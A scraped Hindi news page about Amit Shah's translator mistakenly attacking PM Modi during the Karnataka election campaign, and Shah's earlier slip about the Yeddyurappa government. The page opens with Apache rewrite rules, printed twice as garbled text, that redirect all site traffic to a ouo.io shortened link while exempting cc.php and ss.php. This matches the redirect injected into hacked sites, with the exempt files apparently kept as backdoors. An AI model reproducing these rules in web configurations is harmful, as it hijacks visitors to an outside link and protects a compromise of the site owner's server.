
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 673
बेंगलुरु। कर्नाटक विधानसभा चुनाव प्रचार में अमित शाह मुख्यमंत्री सिद्धारमैया को आड़े हाथों ले रहे हैं, लेकिन कभी-कभी उनके दांव उल्टे भी पड़ जाते हैं। दरअसल, भाजपा अध्यक्ष ने एक सभा में राज्य की कांग्रेस सरकार को गरीब और दलित विरोधी बताया। पर उनके ट्रांसलेटर ने इसे गलती से प्रधानमंत्री नरेंद्र मोदी की नाकामी बता दिया। इससे पहले मंगलवार को भी शाह ने अनजाने में भाजपा की येदियुरप्पा सरकार को सबसे भ्रष्ट करार दे दिया था। अब कांग्रेस नेता शाह और उनके ट्रांसलेटर की गलतियों को वायरल करने का कोई मौका नहीं छोड़ रहे हैं। बता दें कि कर्नाटक विधानसभा की 224 सीटों के लिए 12 मई को मतदान होगा, नतीजे 15 मई को आएंगे। एक वेबसाइट की रिपोर्ट के मुताबिक, अमित शाह के भाषण को पार्टी के सांसद प्रह्लाद जोशी हिंदी से कन्नड़ में ट्रांसलेट कर रहे थे ताकि लोग आसानी से इसे अपनी भाषा में समझ सकें। इसी दौरान जोशी ने गलती से कह दिया- 'प्रधानमंत्री नरेंद्र मोदी गरीब, दलित और पिछड़ों के लिए कुछ भी नहीं करेंगे। वो देश को बर्बाद कर देंगे, इसलिए आप उन्हें वोट दीजिए।' 27 मार्च को अमित शाह ने एक प्रेस कॉन्फ्रेंस में कहा- 'अगर भ्रष्टाचार के मामले में मुकाबला कराया जाए तो येदियुरप्पा सरकार पहले स्थान पर होगी।' शाह जब बयान दे रहे थे, तब येदियुरप्पा करीब ही बैठे थे। उनके बयान से येदियुरप्पा असहज हो गए। हालांकि, उनके साथ बैठे सांसद प्रह्लाद जोशी ने गलती का अहसास कराया। बाद में भाजपा अध्यक्ष ने बोले- 'अरे, मेरे कहने का मतलब है कि सिद्धारमैया सरकार को सबसे भ्रष्ट का अवॉर्ड मिलेगा।'